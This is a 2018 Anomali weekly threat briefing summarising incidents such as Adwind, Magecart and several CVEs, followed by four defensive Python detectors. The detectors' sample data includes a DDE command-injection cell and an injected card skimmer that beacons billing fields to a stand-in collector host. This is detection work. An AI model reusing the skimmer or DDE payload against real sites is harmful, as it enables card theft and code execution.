September 25, 2018 - Anomali Threat Research

Weekly Threat Briefing: Adwind Trojan Circumvents Antivirus Software To Infect Your PC

<div id="weekly"><p id="intro">The intelligence in this week’s iteration discusses the following threats: <b>Credit card theft, DDoS, Phishing, Ransomware, Trojan, Vulnerabilities,</b> and <b>Web cache poisoning.</b> The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p>
<div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2>

<p><a href="https://www.zdnet.com/article/this-is-how-the-adwind-trojan-tricks-antivirus-software-to-infect-your-pc/" target="_blank"><b>Adwind Trojan Circumvents Antivirus Software To Infect Your PC</b></a> (<i>September 24, 2018</i>)<br/>
Unknown threat actors have been observed conducting a spear phishing campaign against machines in Germany and Turkey across various industries, including finance, manufacturing, shipping, and telecoms, in an effort to infect the targets with a Remote Access Trojan (RAT) called “Adwind.” macOS, Windows, and Linux are all vulnerable to this jRAT (Java-based RAT). Like other RATs, the malware logs keystrokes, steals credentials, and tampers with system files; it also steals cryptographic keys in order to access cryptocurrency wallets on infected systems. The jRAT is spread via spear phishing emails carrying a .csv or .xlt attachment that uses Dynamic Data Exchange (DDE) code injection to compromise Microsoft Excel and circumvent signature-based antivirus protections. The threat actor behind the attack modified the RAT to have a low detection rate.<br/>
<a href="https://forum.anomali.com/t/adwind-trojan-circumvents-antivirus-software-to-infect-your-pc/2972" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947282">[MITRE ATT&amp;CK] Dynamic Data Exchange (T1173)</a> | <a href="https://ui.threatstream.com/ttp/947235">[MITRE ATT&amp;CK] Obfuscated Files or Information (T1027)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p>

<p><a href="https://latesthackingnews.com/2018/09/24/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/" target="_blank"><b>AdGuard Reset User Passwords After Enduring Credential Stuffing Attacks</b></a> (<i>September 24, 2018</i>)<br/>
Ad-blocking software company AdGuard reported that it had recently suffered a credential stuffing attack and issued a password reset for all user accounts. The company noticed repeated login attempts from suspicious IP addresses belonging to a variety of servers worldwide, using login credentials that it suspects came from past data breaches at other companies. As of this writing, the unknown threat actors are believed to have gained access to a handful of accounts whose owners had reused the same password on other sites. AdGuard issued an account-wide password reset, but states that no internal servers or data were compromised.<br/>
<a href="https://forum.anomali.com/t/adguard-reset-user-passwords-after-enduring-credential-stuffing-attacks/2973" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a></p>

<p><a href="https://news.softpedia.com/news/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections-522841.shtml" target="_blank"><b>Off-Path TCP Exploit Allows Attackers To Steal Data Via Unencrypted Connections</b></a> (<i>September 21, 2018</i>)<br/>
Associate Professor Zhiyun Qian and doctoral student Weiteng Chen of the University of California discovered a vulnerability in unencrypted Wi-Fi routers that makes them susceptible to a TCP exploit. The exploit can be employed when threat actors intercept the communication between the router and a user’s machine and send a malicious payload that appears legitimate in order to poison the web cache. This allows the threat actor to inject a malicious copy of a web page (typically a login or checkout page) so that every subsequent visit to that page serves the compromised version, potentially giving the actor access to the information and credentials entered on those sites. The vulnerability affects all operating systems (macOS, Windows, and Linux) and has yet to be patched.<br/>
<a href="https://forum.anomali.com/t/off-path-tcp-exploit-allows-attackers-to-steal-data-via-unencrypted-connections/2974" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947103">[MITRE ATT&amp;CK] Domain Fronting (T1172)</a></p>

<p><a href="https://www.zerodayinitiative.com/blog/2018/9/20/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine" target="_blank"><b>ZDI-CAN-6135: A Remote Code Execution Vulnerability In The Microsoft Windows JET Database Engine</b></a> (<i>September 20, 2018</i>)<br/>
A bug has been identified in the Microsoft JET Database Engine that could allow remote code execution. The bug is an out-of-bounds write (the software writes data past the end, or before the beginning, of the intended buffer) that can be triggered by opening a JET data source via OLEDB. A threat actor could exploit this vulnerability by crafting a file containing data stored in the JET database format and getting the targeted user to open it, which would allow code execution at the privilege level of the current process. At the time of the article’s publication, a patch had yet to be released.<br/>
<a href="https://forum.anomali.com/t/zdi-can-6135-a-remote-code-execution-vulnerability-in-the-microsoft-windows-jet-database-engine/2975" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p>

<p><a href="https://thenextweb.com/hardfork/2018/09/20/bitcoin-core-vulnerability-blockchain-ddos/" target="_blank"><b>Crippling DDoS Vulnerability Put The Entire Bitcoin Market At Risk</b></a> (<i>September 20, 2018</i>)<br/>
A Distributed Denial-of-Service (DDoS) vulnerability was discovered affecting Bitcoin Core versions 0.14.0 through 0.16.2 that could bring down the entire Bitcoin blockchain by flooding full node operators with traffic. The vulnerability originates in the consensus code and gave Bitcoin miners the option of sending transaction data twice, which would cause nodes across the Bitcoin network to crash while attempting to validate the duplicate transaction. Exploiting it, however, would require the threat actor to effectively throw away 12.5 BTC ($80,000 USD) to do any damage to the network, so exploitation is considered unlikely. It nonetheless exemplifies a significant vulnerability in the Bitcoin network. Bitcoin software developers have issued a patch for anyone running nodes.<br/>
<a href="https://forum.anomali.com/t/crippling-ddos-vulnerability-put-the-entire-bitcoin-market-at-risk/2976" target="_blank">Click here for Anomali recommendation</a></p>

<p><a href="https://thehackernews.com/2018/09/4g-ee-wifi-modem-hack.html" target="_blank"><b>Flaw In 4GEE WiFi Modem Could Leave Your Computer Vulnerable</b></a> (<i>September 20, 2018</i>)<br/>
Security researcher Osanda Malith of ZeroDayLab discovered a severe vulnerability in the 4G-based 4GEE Mini wireless modems sold by mobile operator EE. The vulnerability, registered as “CVE-2018-14327,” allows a low-privileged user account to escalate privileges on any Windows machine that has connected to the EE Mini modem via USB. It lies in the driver files the modem installs on Windows machines: the folder permissions allow anyone to read, write, execute, create, and delete anything inside that folder and its subfolders. To exploit the vulnerability, an attacker only has to replace the “ServiceManager.exe” file in the driver folder with a malicious file; the driver then runs the tainted file with SYSTEM privileges after a reboot. EE has released a patch for this vulnerability.<br/>
<a href="https://forum.anomali.com/t/flaw-in-4gee-wifi-modem-could-leave-your-computer-vulnerable/2977" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947090">[MITRE ATT&amp;CK] File System Permissions Weakness (T1044)</a></p>

<p><a href="https://www.zdnet.com/article/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/" target="_blank"><b>This Windows File May Be Secretly Hoarding Your Passwords And Emails</b></a> (<i>September 19, 2018</i>)<br/>
Windows machines with the handwriting recognition feature enabled, which translates stylus and touchscreen writing into formatted text, are susceptible to a Windows file named “WaitList.dat” storing sensitive information, such as passwords, without the user’s knowledge. The file is intended to store text that helps Windows improve handwriting recognition, so that it recognises and accurately suggests corrections and words based on what a user writes frequently. However, once the feature is enabled, text from every document and email is indexed into this file, not only from files that interacted with the touchscreen feature. The actual text of the documents is stored in WaitList.dat, not just their metadata. If threat actors gained unauthorised access to this file on a machine, they would have access to the sensitive data unwittingly stored in it, compromising many facets of information.<br/>
<a href="https://forum.anomali.com/t/this-windows-file-may-be-secretly-hoarding-your-passwords-and-emails/2978" target="_blank">Click here for Anomali recommendation</a></p>

<p><a href="https://www.volexity.com/blog/2018/09/19/magecart-strikes-again-newegg/" target="_blank"><b>Magecart Strikes Again: Newegg In The Crosshairs</b></a> (<i>September 19, 2018</i>)<br/>
E-commerce company Newegg is the latest victim of a credit card-skimming campaign by the threat group Magecart. Between late August and early September 2018, Magecart stole credit card data from British Airways and Feedify, and appears to have used the same malicious JavaScript code to compromise the Newegg checkout page and obtain card details. The Newegg breach occurred between August 13, 2018 and September 18, 2018. The campaigns against Newegg and British Airways appear to have run around the same time, with the Newegg campaign starting a week earlier. The malicious JavaScript was injected into the “Billing Information” page of the company’s online store and sent the details entered there to a domain controlled by the threat group, where they were stored.<br/>
<a href="https://forum.anomali.com/t/magecart-strikes-again-newegg-in-the-crosshairs/2979" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947267">[MITRE ATT&amp;CK] Drive-by Compromise (T1189)</a></p>

<p><a href="https://www.securify.nl/advisory/SFY20180102/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges.html" target="_blank"><b>Authentication Bypass Vulnerability In Western Digital My Cloud Allows Escalation To Admin Privileges</b></a> (<i>September 18, 2018</i>)<br/>
A vulnerability was discovered in the “My Cloud” devices from storage company Western Digital. The vulnerability, registered as “CVE-2018-17153,” allows unauthorised actors to bypass authentication and have their activity from a specific IP address registered as an administrator session. A threat actor could establish an administrator session through the “network_mgr.cgi” CGI module over HTTP, which marks the actor’s IP address as an admin session and lets them bypass authentication on subsequent logins to the device over the internet, giving the actor complete control of the device. At the time of the article’s publication, a patch had not been developed or released.<br/>
<a href="https://forum.anomali.com/t/authentication-bypass-vulnerability-in-western-digital-my-cloud-allows-escalation-to-admin-privileges/2980" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947222">[MITRE ATT&amp;CK] Account Manipulation (T1098)</a></p>

<p><a href="https://news.softpedia.com/news/paste-site-used-as-hosting-service-for-filesman-backdoor-522765.shtml" target="_blank"><b>Paste Site Used As Hosting Service For FilesMan Backdoor</b></a> (<i>September 18, 2018</i>)<br/>
Researcher Bruno Zanelato discovered a backdoor called “FilesMan” dropped onto several websites by a PHP file that threat actors had previously placed in the website’s structure. This PHP file contains payload download code that fetches the malware to download and install the backdoor. The PHP file “wp-content/themes/buildup/db.php” decrypts that payload code to install the FilesMan backdoor, which allows the threat actor to access the website from their own machine.<br/>
<a href="https://forum.anomali.com/t/paste-site-used-as-hosting-service-for-filesman-backdoor/2981" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947202">[MITRE ATT&amp;CK] Shared Webroot (T1051)</a></p>

<p><a href="https://latesthackingnews.com/2018/09/18/bristol-airport-flight-display-screens-failed-after-ransomware-incident/" target="_blank"><b>Bristol Airport Flight Display Screens Failed After Ransomware Incident</b></a> (<i>September 18, 2018</i>)<br/>
Flight display screens at Bristol Airport were inoperable for three consecutive days following a ransomware attack. The airport resorted to writing flight times, updates, and gate numbers by hand on whiteboards and flip charts to maintain flight services. Flights operated as normal, though the airport asked travellers to arrive earlier to allow extra time for check-in and boarding. The airport was able to contain the attack and restore the flight display screens. Security officials reported that no ransom was paid and that security systems remained unaffected during the incident.<br/>
<a href="https://forum.anomali.com/t/bristol-airport-flight-display-screens-failed-after-ransomware-incident/2982" target="_blank">Click here for Anomali recommendation</a></p>

<p><a href="https://www.theregister.co.uk/2018/09/18/perth_mint_data_breach/" target="_blank"><b>Just 13 – No, Er, Make That 3,200 Punters Hit In Oz's Perth Mint Hack</b></a> (<i>September 18, 2018</i>)<br/>
A security breach at the Australian government’s official mint, Perth Mint, that was initially believed to have affected only 13 customers has turned out to affect over 3,200. The incident appears to have been caused by security failings at a third-party provider; the company’s internal systems were not compromised. The company has contacted affected customers to notify them that their personal information was breached, but their investments were not impacted and remain secure.<br/>
<a href="https://forum.anomali.com/t/just-13-no-er-make-that-3-200-punters-hit-in-ozs-perth-mint-hack/2983" target="_blank">Click here for Anomali recommendation</a></p>

<p><a href="https://www.fortinet.com/blog/threat-research/beware-of-emails-purporting-to-be-from-the-irs.html" target="_blank"><b>Beware Of Emails Purporting To Be From The IRS</b></a> (<i>September 17, 2018</i>)<br/>
Researchers at Fortinet discovered a recent phishing email campaign impersonating the US Internal Revenue Service (IRS). The email targets “Non-Resident Alien” taxpayers and asks them to fill out an attached PDF that certifies the recipient is a non-resident or foreign corporation. The attachment, named “W-8BEN Form.PDF,” impersonates a legitimate IRS form. The file contains no malicious macros or code, so it appears clean when opened. The email asks the target to fill out the form and fax it to a specific fax number. The objective of the campaign is to steal Personally Identifiable Information (PII).<br/>
<a href="https://forum.anomali.com/t/beware-of-emails-purporting-to-be-from-the-irs/2984" target="_blank">Click here for Anomali recommendation</a></p>

<p><a href="https://www.tenable.com/blog/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder" target="_blank"><b>Tenable Research Advisory: Peekaboo Critical Vulnerability In NUUO Network Video Recorder</b></a> (<i>September 17, 2018</i>)<br/>
Researchers at Tenable discovered two vulnerabilities in the “Network Video Recorder” software of the “NVRMini2” network-connected video recording device from surveillance company NUUO. The vulnerabilities, registered as “CVE-2018-1149” and “CVE-2018-1150,” are linked to third-party vendor software installed on the device. The first, CVE-2018-1149, is an unauthenticated stack buffer overflow that allows remote code execution with root/administrator privileges and could be leveraged to take over the NVRMini2 and manipulate the connected cameras. The second, CVE-2018-1150, is a backdoor believed to be leftover debug code; it exposes the list of all user accounts on the system and allows their passwords to be changed. Changing a password would let a threat actor sign in as a legitimate user with their own passcode to view camera feeds and CCTV recordings, or delete a camera from the system entirely. Together, these vulnerabilities could allow threat actors to tamper with security footage and live feeds. A patch is in development for both vulnerabilities.<br/>
<a href="https://forum.anomali.com/t/tenable-research-advisory-peekaboo-critical-vulnerability-in-nuuo-network-video-recorder/2985" target="_blank">Click here for Anomali recommendation</a><br/>
<b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947209">[MITRE ATT&amp;CK] Third-party Software (T1072)</a></p></div></div>
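The Adwind story above describes .csv and .xlt attachments that carry a DDE injection so that opening them in Excel runs code. The following is an added example, not code from the briefing or from any vendor: a small attachment scanner a mail gateway or analyst could run over a CSV before it reaches a user. It flags cells that a spreadsheet would evaluate as a formula (leading `=`, `+`, `-`, `@`) and, more specifically, cells shaped like a DDE launch (`application|topic!item`), while letting plain negative numbers through. The sample CSV, the `placeholder` command text and the verdict names are constructed for this example.

```python
"""Scan a CSV attachment for formula / DDE injection cells (added example)."""
import csv
import io
import re
from typing import Dict, List, Optional

# Leading characters that make Excel treat a CSV cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# DDE launch shape inside a formula: <application>|<topic>!<item>
DDE_SHAPE = re.compile(r"\|.*!")


def looks_numeric(text: str) -> bool:
    """'-12.50' or '+3' are numbers, not formulas."""
    try:
        float(text)
        return True
    except ValueError:
        return False


def classify_cell(cell: str) -> Optional[str]:
    """Return 'dde', 'formula' or None for one cell value.

    Leading whitespace is stripped before the check, which is deliberately
    conservative: it flags a few more cells rather than fewer.
    """
    stripped = cell.lstrip()
    if not stripped or stripped[0] not in FORMULA_TRIGGERS:
        return None
    if looks_numeric(stripped):
        return None
    if DDE_SHAPE.search(stripped):
        return "dde"
    return "formula"


def scan_csv(text: str) -> List[Dict]:
    """Return one finding per suspicious cell with its row/column position."""
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            kind = classify_cell(cell)
            if kind:
                findings.append({"row": row_no, "col": col_no,
                                 "kind": kind, "cell": cell[:60]})
    return findings


def verdict(findings: List[Dict]) -> str:
    """Policy: any DDE-shaped cell quarantines the file; plain formulas get review."""
    if any(f["kind"] == "dde" for f in findings):
        return "quarantine"
    return "review" if findings else "clean"


# Constructed sample: an invoice-like sheet with a negative amount (benign),
# an ordinary formula, and a DDE-shaped cell whose command is a placeholder.
SAMPLE_CSV = """invoice,amount,note
INV-1001,-12.50,credit applied
INV-1002,=SUM(B2:B2),total
INV-1003,100,"=cmd|'/c placeholder'!A0"
"""

if __name__ == "__main__":
    found = scan_csv(SAMPLE_CSV)
    for f in found:
        print(f"row {f['row']} col {f['col']}: {f['kind']:<8} {f['cell']}")
    print("verdict:", verdict(found))
```

Signature-based antivirus misses these attachments because the cell text is unique per campaign; checking the structural shape of each cell instead is what makes this catch variants. Pair it with disabling DDE in Office via policy, which the first ATT&CK link above (T1173) documents.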
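The AdGuard story above describes the pattern that gives credential stuffing away: one source address cycling through many different usernames with mostly failed logins, as opposed to brute force, which hammers a single account. This added example (not AdGuard's code, and not from the briefing) runs a sliding-window check over authentication log lines and labels each source IP as credential stuffing, brute force or normal, then lists the accounts that need a password reset because the flagged IP logged into them successfully. The log format, field names, thresholds and IP addresses are constructed for the example.

```python
"""Label source IPs from auth logs as credential stuffing / brute force (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Tuple

# Constructed log format; adapt the regex to the real authentication log.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) login result=(?P<result>ok|fail) user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)


def parse_line(line: str) -> Optional[Dict]:
    """Parse one log line; lines that are not login events return None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def window_peaks(evs: List[Dict], window: timedelta) -> Tuple[int, int]:
    """Max distinct users and max attempts seen inside any window for one IP."""
    peak_users = peak_attempts = 0
    start = 0
    for end in range(len(evs)):
        while evs[end]["ts"] - evs[start]["ts"] > window:
            start += 1
        span = evs[start:end + 1]
        peak_attempts = max(peak_attempts, len(span))
        peak_users = max(peak_users, len({e["user"] for e in span}))
    return peak_users, peak_attempts


def analyse(lines: List[str], window: timedelta = timedelta(minutes=10),
            min_users: int = 5, min_attempts: int = 5) -> Dict[str, Dict]:
    """Per-IP verdict. Stuffing = many users; brute force = many tries, few users."""
    by_ip: Dict[str, List[Dict]] = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        by_ip[ev["ip"]].append(ev)
    report = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        users, attempts = window_peaks(evs, window)
        if users >= min_users:
            label = "credential_stuffing"
        elif attempts >= min_attempts:
            label = "brute_force"
        else:
            label = "normal"
        report[ip] = {
            "label": label,
            "distinct_users": users,
            "peak_attempts": attempts,
            "failures": sum(e["result"] == "fail" for e in evs),
            # Accounts this IP got into: these are the ones to reset.
            "successful_users": sorted({e["user"] for e in evs if e["result"] == "ok"}),
        }
    return report


def accounts_to_reset(report: Dict[str, Dict]) -> List[str]:
    """Accounts successfully accessed from any IP that was flagged."""
    return sorted({u for r in report.values() if r["label"] != "normal"
                   for u in r["successful_users"]})


# Constructed sample log: one stuffing source, one brute-force source, one normal user.
SAMPLE_LOG = """2018-09-20T09:58:10Z login result=ok user=alice ip=192.0.2.9
2018-09-20T10:00:01Z login result=fail user=alice ip=203.0.113.5
2018-09-20T10:00:02Z login result=fail user=bob ip=203.0.113.5
2018-09-20T10:00:03Z login result=fail user=carol ip=203.0.113.5
2018-09-20T10:00:04Z login result=ok user=dave ip=203.0.113.5
2018-09-20T10:00:05Z login result=fail user=erin ip=203.0.113.5
2018-09-20T10:00:06Z login result=fail user=frank ip=203.0.113.5
2018-09-20T10:01:00Z login result=fail user=carol ip=198.51.100.7
2018-09-20T10:01:05Z login result=fail user=carol ip=198.51.100.7
2018-09-20T10:01:10Z login result=fail user=carol ip=198.51.100.7
2018-09-20T10:01:15Z login result=fail user=carol ip=198.51.100.7
2018-09-20T10:01:20Z login result=fail user=carol ip=198.51.100.7
this line is not a login event and is skipped
"""

if __name__ == "__main__":
    rep = analyse(SAMPLE_LOG.splitlines())
    for ip, r in rep.items():
        print(f"{ip:<14} {r['label']:<20} users={r['distinct_users']} "
              f"attempts={r['peak_attempts']} fails={r['failures']}")
    print("reset:", accounts_to_reset(rep))
```

The distinct-user count is the discriminating signal: a botnet spreading attempts across many IPs will keep each IP under the threshold, so in production the same peaks should also be computed per user-agent and per /24, and the successful logins from flagged sources feed the targeted reset that AdGuard chose to apply account-wide.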
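The Bitcoin Core story above turns on a consensus check: a block that presents the same transaction data twice must be rejected by validation, not discovered later as an inconsistency that aborts the node. The toy below is an added example written for this briefing; it is not Bitcoin Core's code and omits almost everything real validation does (scripts, signatures, fees, Merkle roots). Its `check_block` function is the one idea the story is about, generalised slightly: it rejects a block that repeats a transaction, that spends the same output twice across different transactions, that misplaces the coinbase, or that creates value, and `apply_block` only touches the UTXO set after that check passes. All transaction data, owners and values are constructed.

```python
"""Toy block validator: reject duplicate transactions / double-spent outpoints (added example)."""
import hashlib
import json
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

Outpoint = Tuple[str, int]  # (txid of the funding transaction, output index)


@dataclass(frozen=True)
class TxOut:
    value: int   # toy units, not satoshis
    owner: str


@dataclass(frozen=True)
class TxIn:
    prev_txid: str
    index: int


@dataclass(frozen=True)
class Tx:
    inputs: Tuple[TxIn, ...]    # empty tuple = coinbase
    outputs: Tuple[TxOut, ...]

    def txid(self) -> str:
        body = {"in": [(i.prev_txid, i.index) for i in self.inputs],
                "out": [(o.value, o.owner) for o in self.outputs]}
        return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


def check_block(txs: List[Tx], utxo: Dict[Outpoint, TxOut]) -> Tuple[bool, Optional[str]]:
    """Validate a block against the current UTXO set without mutating anything."""
    seen_txids = set()
    spent = set()   # outpoints consumed so far in this block
    for pos, tx in enumerate(txs):
        tid = tx.txid()
        if tid in seen_txids:
            return False, f"duplicate transaction {tid[:12]}"
        seen_txids.add(tid)
        if not tx.inputs:
            if pos != 0:
                return False, "coinbase transaction not at position 0"
            continue
        in_value = 0
        for txin in tx.inputs:
            op = (txin.prev_txid, txin.index)
            if op in spent:
                return False, f"outpoint {op} spent twice in block"
            if op not in utxo:
                return False, f"outpoint {op} not in UTXO set"
            spent.add(op)
            in_value += utxo[op].value
        if sum(o.value for o in tx.outputs) > in_value:
            return False, f"transaction {tid[:12]} creates value"
    return True, None


def apply_block(txs: List[Tx], utxo: Dict[Outpoint, TxOut]
                ) -> Tuple[Dict[Outpoint, TxOut], Optional[str]]:
    """Return (new_utxo, None) on success or (unchanged_utxo, reason) on rejection."""
    ok, reason = check_block(txs, utxo)
    if not ok:
        return utxo, reason
    new = dict(utxo)
    for tx in txs:
        for txin in tx.inputs:
            del new[(txin.prev_txid, txin.index)]   # safe: check_block proved it exists once
        for n, out in enumerate(tx.outputs):
            new[(tx.txid(), n)] = out
    return new, None


def genesis_utxo() -> Dict[Outpoint, TxOut]:
    """Constructed starting state: two unspent outputs."""
    return {("genesis", 0): TxOut(50, "alice"), ("genesis", 1): TxOut(25, "bob")}


if __name__ == "__main__":
    utxo = genesis_utxo()
    tx1 = Tx(inputs=(TxIn("genesis", 0),), outputs=(TxOut(50, "carol"),))
    print(check_block([tx1, tx1], utxo))     # duplicate transaction
    print(check_block([tx1], utxo))          # (True, None)
```

The deletion inside `apply_block` is exactly the place where a node without the prior check would hit an inconsistency on the second copy of the transaction; keeping validation and state mutation separate means a malicious block costs the verifier a rejection message rather than a crash.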
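The Magecart story above describes a skimmer injected into the "Billing Information" page that reads the entered details and sends them to an attacker-controlled domain. A defender who cannot read every line of the checkout page can still inventory what scripts run on it and where they talk to. This added example (not Volexity's, Newegg's or the briefing's code) parses a checkout page's HTML, lists every script together with the hosts it references, and flags any script that references a host outside an allowlist, rating it high when the same script also reads form fields and has a way to send data out. The sample page, the allowlist hosts and the `.invalid` collector domain are constructed for the example.

```python
"""Inventory scripts on a checkout page and flag unexpected hosts (added example)."""
import re
from html.parser import HTMLParser
from typing import Dict, FrozenSet, List, Optional
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"()<>]+")
# Heuristics: does the script read form values, and can it send data anywhere?
FORM_READ_RE = re.compile(r"\.value\b|document\.forms|FormData\(|querySelectorAll\([^)]*input")
SEND_RE = re.compile(r"sendBeacon|XMLHttpRequest|fetch\s*\(|new\s+Image|\.src\s*=")


class ScriptCollector(HTMLParser):
    """Collect each <script> with its src attribute and inline body."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Dict] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append({"src": dict(attrs).get("src"), "body": ""})
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def script_hosts(script: Dict) -> List[str]:
    """Hosts a script loads from or references in URL literals (relative = own origin)."""
    hosts = set()
    if script["src"]:
        hosts.add(urlparse(script["src"]).hostname)
    for url in URL_RE.findall(script["body"]):
        hosts.add(urlparse(url).hostname)
    hosts.discard(None)
    return sorted(hosts)


def audit_page(html: str, allowed_hosts: FrozenSet[str]) -> List[Dict]:
    """One finding per script that references a host not on the allowlist."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for idx, script in enumerate(parser.scripts):
        foreign = [h for h in script_hosts(script) if h not in allowed_hosts]
        if not foreign:
            continue
        reads_form = bool(FORM_READ_RE.search(script["body"]))
        can_send = bool(SEND_RE.search(script["body"]))
        findings.append({
            "script": idx,
            "src": script["src"],
            "foreign_hosts": foreign,
            "severity": "high" if (reads_form and can_send) else "medium",
        })
    return findings


# Constructed allowlist: the shop's own static host is the only expected external origin.
ALLOWED_HOSTS: FrozenSet[str] = frozenset({"static.example-shop.test"})

# Constructed page: two legitimate scripts, one relative script, one injected inline script
# that reads the billing form and beacons it to a constructed '.invalid' collector.
SAMPLE_PAGE = """<html><head>
<script src="https://static.example-shop.test/checkout.js"></script>
<script>window.dataLayer = window.dataLayer || []; dataLayer.push({page: "billing"});</script>
</head><body>
<form id="billing"><input name="cc_number"><input name="cc_cvv"></form>
<script src="/static/jquery.js"></script>
<script>
document.getElementById("billing").addEventListener("submit", function () {
  var fields = document.querySelectorAll("#billing input");
  var payload = {}; fields.forEach(function (f) { payload[f.name] = f.value; });
  navigator.sendBeacon("https://checkout-stats.invalid/collect", JSON.stringify(payload));
});
</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_PAGE, ALLOWED_HOSTS):
        print(f"script #{f['script']} src={f['src']} hosts={f['foreign_hosts']} {f['severity']}")
```

Run on a fetched copy of the live checkout page on a schedule, diffing the findings against the previous run; a new foreign host on the billing page is the event that matters. A Content-Security-Policy whose `connect-src` and `script-src` carry the same allowlist turns the same inventory into an enforced control in the browser, with violation reports pointing at the injected domain.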
